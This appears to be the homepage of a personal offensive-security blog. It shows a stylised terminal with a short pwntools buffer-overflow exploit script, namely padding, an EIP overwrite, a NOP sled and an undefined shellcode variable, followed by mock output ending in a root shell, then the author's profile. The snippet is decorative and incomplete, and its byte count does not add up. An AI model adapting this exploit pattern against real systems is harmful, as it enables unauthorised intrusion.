FROM SKID
TO RING0

welcome to my personal space - all my research and writeups will be contained here and can be accessed via the blog portion of the website.

root@kali:~/exploits

root@kali:~/exploits$ cat exploit.py

from pwn import *

 

target = remote('10.10.10.5', 1337)

padding = b"A" * 512

eip = p32(0xdeadbeef) # Overwrite EIP

nop_sled = b"\x90" * 32

payload = padding + eip + nop_sled + shellcode

 

log.info(f"Sending {len(payload)} bytes...")

target.sendline(payload)

target.interactive()

$ python3 exploit.py

[+] Opening connection to 10.10.10.5 on port 1337: Done

[*] Sending 844 bytes...

[*] Switching to interactive mode

$ whoami

root

$ _

CLASSIFIED
Profile
ROLE: INFRASTRUCTURE ENGINEER
CERTS: OSCP & CPTS (WIP)
STATUS: ONLINE
LOC: LONDON, UK

/ABOUT-ME

an infrastructure engineer based in london documenting his journey transitioning into offsec and red teaming. a repository which houses things i find interesting such as vulnerability research, exploit development and ctf writeups

Recent Projects

Security Research & Development

PROJECT ARCHIVE

AUTHOR: RING0_01 // ACCESS: PUBLIC